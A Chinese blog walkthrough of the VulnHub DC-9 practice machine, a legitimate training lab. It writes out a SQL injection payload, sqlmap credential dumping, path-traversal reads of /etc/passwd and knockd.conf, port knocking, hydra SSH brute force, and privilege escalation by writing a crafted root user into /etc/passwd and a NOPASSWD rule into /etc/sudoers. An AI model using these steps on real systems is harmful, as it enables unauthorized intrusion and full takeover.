首页 > 其他分享 >vulnhub DC-9靶场

vulnhub DC-9靶场

时间:2023-12-13 16:59:50浏览次数:30  
标签:.. etc 端口 DC 192.168 42.150 密码 vulnhub 靶场

1.信息收集

扫描主机

sudo arp-scan -l

1

扫描端口,发现只有80端口

nmap -p- 192.168.42.150

2

扫描80开放的服务

nmap -p 80 -A -V 192.168.42.150

4 (2)

2.漏洞发掘

访问主页面

5

发现有查找功能,猜测此处有sql注入漏洞

测试sql注入漏洞

‘ or 1=1#

7

获取成功,存在注入漏洞,开始利用

8

10 (2)

bp开始抓包,跑sqlmap

10 (1)

跑出了admin的账号和密码

11

密码明显长度不太对,猜测为md5加密,在网上在线破解,得到密码

12

admin登录,开始逛街

13

发现下面提示,猜测有文件包含漏洞(目录穿越)

16 (1)

不放心可以多敲几个../

?file=../../../../../../../../../etc/passwd

17

因为前面我们只扫描到80端口,22没有扫到,那只有两种情况,一种22没有开放,一种有knockd服务,

该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

如果开启了knockd服务,那么会存在一个配置文件/etc/knockd.conf,该配置文件中保存着需要访问的端口顺序。我们可以通过文件包含漏洞查看该配置文件

?file=/etc/knockd.conf

18

根据配置文件,依次访问三个端口,再次扫描,发现22端口开放

knock 192.168.42.150 7469 8475 9842

19

因为之前sqlmap跑出了三个数据库,我们看看另一个内容

14

发现一堆账号密码,尝试ssh爆破

16 (2)

九头蛇爆破,发现3个账号,只有janitor有东西

hybra -L 账号. txt -P 密码.txt ssh://192.168.42.150

20

21

3.横向渗透

ssh连接

ssh [email protected]

22

ls发现没文件,ls -al查看隐藏文件,发现新的密码本

23

重新爆破密码,发现新的账号

fredf B4-Tru3-001

32

4.提升权限

常规查看权限

sudo -l

24

尝试执行,返回错误,找到test.py,查看代码

find / -name test.py 2>/dev/null

25

发现代码作用需要两个文件,把第一文件追加到第二个文件后

4.1构造用户行,写入/etc/passwd

openssl生成密码,前一个xihe为账号,后一个为要加密的密码,

openssl passwd -1 -salt xihe xihe

生成的密码

$1$xihe$UAMCUAzSxt0fZHIag4Ryi1

26

把密码写入一个文件中,使用该脚本,追加成功

echo写不进去,用vi写

27

切换用户 su ,提权成功

28

4.2构造权限行,写入/etc/sudoers

fredf用户为root,不需要任何密码

fredf ALL=(root) NOPASSWD:ALL

echo "fredf ALL=(root) NOPASSWD:ALL" > 3.txt
sudo /opt/devstuff/dist/test/test 3.txt /etc/sudoers

29

sudo su root

31

标签:..,etc,端口,DC,192.168,42.150,密码,vulnhub,靶场
From: https://www.cnblogs.com/xiheaaa/p/17899410.html

相关文章

  • orchardcore 部署saas系统
    使用orchardcore搭建saas的webhost服务网络托管服务是一种互联网托管服务,允许个人和组织通过万维网访问他们的网站。我们将使用OrchardCoreCMS框架创建一个多租户、SaaS、Web托管服务。1启动VisualStudio,然后“创建新项目”。选择“ASP.NETCoreWebApplication”......
  • DC-8靶场
    准备:目标:获得root权限攻击虚拟机:kali  DC-8靶场:DC:8~VulnHub 虚拟机:IP地址 192.168.88.130 靶场IP地址:192.168.88.129 第一步:信息收集通过arp-scan-l查看本网段的虚拟机也可以通过nmap或者 netdiscover-r192.168.88.0/24netdiscover-r192.168.88......
  • vulnhub DC-5靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyri......
  • 多种DC电源模块的比较和评价
    多种DC电源模块的比较和评价BOSHIDADC电源模块是一种重要的电子零件,可以将交流电转换为直流电,并为相应的电路提供所需的电能。随着技术的进步,市场上的DC电源模块种类越来越多,不同类型的DC电源模块有着不同的特点和优缺点。 1.线性稳压模块线性稳压模块是一种简单而实用的DC......
  • CH32V307 ADC与触摸按键的使用
    CH32V307的ADC模块具有两个独立的ADC单元,12位分辨率,支持16个外部通道和2个内部信号源采样。CH32V307的触摸检测单元,借助ADC模块的电压转换功能,通过将电容量转换为电压量进行采样,实现触摸按键检测功能。检测通道复用ADC的16个外部通道,通过ADC模块的单次转换模式实现触摸按键检测。......
  • 热点 | 百利天恒HER3/EGFR双抗ADC
     前言:新开一个标签-《热点》,强迫自己去学习一下领域的热点事件,精通是不太可能了,但最少要知道是个怎么回事。 科普:什么是ADC?可以简单理解为抗体靶向+化疗杀伤的结合。抗体偶联药物(antibodydrugconjugates,ADCs)是一类将特异性单克隆抗体与细胞毒性药物通过接头偶联形成的......
  • vulnhub DC-4靶场
    1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹,没有收获查找目录,无敏感信息2.漏洞利用访问网站,发现只有登录框,猜测为弱密码或密码爆破bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)账号密码为adminhappy进入网......
  • 写了一个flinkcdc的简单demo,大概说一下实现过程和建议点
    架构图大致如下:版本信息大致如下,具体版本信息根据自己的需求进行调整即可:oracle:19cflinkcdc:2.4.0kafka:3.1.2flink:1.15.4mysql:8.0.27springboot:2.5.6实现需求:1.使用flinkcdc采集oracle中的数据(历史数据+增量数据:含增删改)同步至kafka的某个topic中2.使用flink消费kafka中......
  • vulnhub DC-1靶场
    1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2......
  • Polar靶场web刷题记录
    Polar靶场web刷题记录简单部分swp考点:敏感文件、preg_match()函数绕过根据题目名提示访问/.index.php.swp可以用代码格式化工具美化一下functionjiuzhe($xdmtql){ returnpreg_match('/sys.*nb/is',$xdmtql);}$xdmtql=@$_POST['xdmtql'];if(!is_array($xdmtql)){......